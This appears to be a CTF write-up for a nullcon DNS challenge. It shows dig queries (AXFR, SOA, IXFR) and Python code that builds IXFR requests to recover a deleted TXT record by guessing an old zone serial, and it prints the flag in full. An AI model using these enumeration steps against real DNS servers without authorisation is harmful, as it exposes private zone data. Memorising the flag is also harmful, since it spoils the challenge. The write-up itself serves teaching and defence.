# Zoney

**Category:** Misc (DNS / Recon)

**Difficulty:** Medium

#### 1. Challenge Overview

The challenge provided a DNS server at `52.59.124.14:5054` for the domain `flag.ctf.nullcon.net`. The author hinted that the flag was hidden and challenged me to "show that I know all about DNS."

#### 2. Vulnerability Analysis

**Step 1: Initial Reconnaissance**

I started by checking for the flag in standard `TXT` records at the apex.

```bash
dig @52.59.124.14 -p 5054 TXT flag.ctf.nullcon.net
```

**Result:** `flag.ctf.nullcon.net. 300 IN TXT "The flag was removed."`

The server claimed the flag was gone, but the presence of a custom message suggested it might still be accessible through advanced DNS features.

**Step 2: Failed Enumeration Attempts**

I attempted several standard DNS exploitation techniques, all of which were unsuccessful:

* **Zone Transfer (AXFR):** `dig @52.59.124.14 -p 5054 AXFR flag.ctf.nullcon.net` — Result: `; Transfer failed.`
* **DNSSEC Walking:** Querying for non-existent records with `+dnssec` did not return `NSEC` records, so unlike the previous challenge this zone wasn't "walkable".
* **Chaos Class (CH):** Querying `CH TXT flag.ctf.nullcon.net` returned the same "flag was removed" message.
* **EDNS Client Subnet:** Testing with `+subnet=127.0.0.1` and other subnets did not change the output.

**Step 3: Investigating Zone History (IXFR)**

I checked the **SOA (Start of Authority)** record to see the serial number:

```bash
dig @52.59.124.14 -p 5054 SOA flag.ctf.nullcon.net
```

**Result:** Serial was `1500`.

This indicated the zone had undergone many updates. I tested an **Incremental Zone Transfer (IXFR)** to see the changes between version `1499` and `1500`:

```bash
dig @52.59.124.14 -p 5054 IXFR=1499 flag.ctf.nullcon.net
```

**Discovery:** The response showed the admin explicitly removing a record:

`flag.ctf.nullcon.net. 300 IN TXT "Phew, removed the flag before anyone could get it"`

#### 3. Developing the Exploit

Since the IXFR diff showed the flag being removed at version 1499, the record had to exist in an earlier version of the zone. In CTF environments, "leet" numbers are often used for significant updates, so I targeted serial **1337** to see the state of the zone at that point in its history.

#### 4. The Solution Script (Manual Command)

The winning command requested the incremental changes starting from version 1337.

```bash
dig @52.59.124.14 -p 5054 IXFR=1337 flag.ctf.nullcon.net
```

#### 5. The Winning Payload

The server responded with the diff starting from serial 1337, revealing the original record:

```plaintext
flag.ctf.nullcon.net. 300 IN SOA ns.ctf.nullcon.net. admin.ctf.nullcon.net. 1337 3600 1800 604800 86400
flag.ctf.nullcon.net. 300 IN A 10.13.37.1
flag.ctf.nullcon.net. 300 IN TXT "Update #1337: ENO{1337_1ncr3m3nt4l_z0n3_tr4nsf3r_m4st3r_8f9a2c1d}"
```

#### 6. Result

* **Flag:** `ENO{1337_1ncr3m3nt4l_z0n3_tr4nsf3r_m4st3r_8f9a2c1d}`
* **Lessons Learned:** DNS servers that support `IXFR` often keep a journal of zone updates. If a record is deleted, it may still be retrievable through `IXFR` if the attacker can guess or brute-force the serial number of a previous version, because the requested serial is chosen by the client.
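To make the mechanism concrete, here is an added example (not part of the original write-up) that builds the same request `dig IXFR=1337` sends and then parses it the way the server, or a sensor on the wire, sees it: the guessed serial is nothing more than a 32-bit field in the SOA record carried in the request's authority section. The `ns.placeholder.`/`hostmaster.placeholder.` names and the single-question assumption in the parser are mine.

```python
import struct
IXFR, SOA = 251, 6  # RR type codes (RFC 1995 / RFC 1035)

def encode_name(name: str) -> bytes:
    """Encode a dotted name as uncompressed DNS labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(pkt: bytes, off: int):
    """Decode a name, following compression pointers; return (name, offset past it)."""
    labels = []
    while True:
        n = pkt[off]
        if n & 0xC0 == 0xC0:  # pointer: the rest of the name lives elsewhere in the packet
            tail, _ = decode_name(pkt, ((n & 0x3F) << 8) | pkt[off + 1])
            return ".".join(labels + [tail.rstrip(".")]).strip(".") + ".", off + 2
        if n == 0:
            return ".".join(labels) + ".", off + 1
        labels.append(pkt[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n

def build_ixfr_request(zone: str, serial: int, txid: int = 0x1337) -> bytes:
    """IXFR request (RFC 1995 s.3): question type IXFR plus an authority-section
    SOA whose SERIAL is the zone version the client claims to hold. MNAME/RNAME
    are placeholders of my own; the server only looks at the serial."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 1, 0)  # QD=1 AN=0 NS=1 AR=0
    question = encode_name(zone) + struct.pack("!HH", IXFR, 1)  # class IN
    rdata = encode_name("ns.placeholder.") + encode_name("hostmaster.placeholder.")
    rdata += struct.pack("!IIIII", serial, 0, 0, 0, 0)  # serial refresh retry expire min
    authority = encode_name(zone) + struct.pack("!HHIH", SOA, 1, 0, len(rdata)) + rdata
    return header + question + authority

def parse_ixfr_request(pkt: bytes) -> dict:
    """Server/sensor view of a request: zone, qtype, claimed serial (None if no SOA)."""
    txid, _flags, _qd, _an, ns, _ar = struct.unpack_from("!HHHHHH", pkt, 0)
    zone, off = decode_name(pkt, 12)  # assumes a single question
    qtype, _qclass = struct.unpack_from("!HH", pkt, off)
    off, serial = off + 4, None
    for _ in range(ns):
        _, off = decode_name(pkt, off)  # owner name of the authority RR
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
        off += 10
        if rtype == SOA:  # serial is the first 32-bit field after MNAME and RNAME
            _, o = decode_name(pkt, off)
            _, o = decode_name(pkt, o)
            serial = struct.unpack_from("!I", pkt, o)[0]
        off += rdlen
    return {"id": txid, "zone": zone, "qtype": qtype, "serial": serial}
```

Because the serial is client-supplied and unauthenticated, the fix belongs on the server: restrict `AXFR`/`IXFR` to known secondaries (for example BIND's `allow-transfer` or TSIG-signed transfers) rather than relying on a record having been deleted from the current zone.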

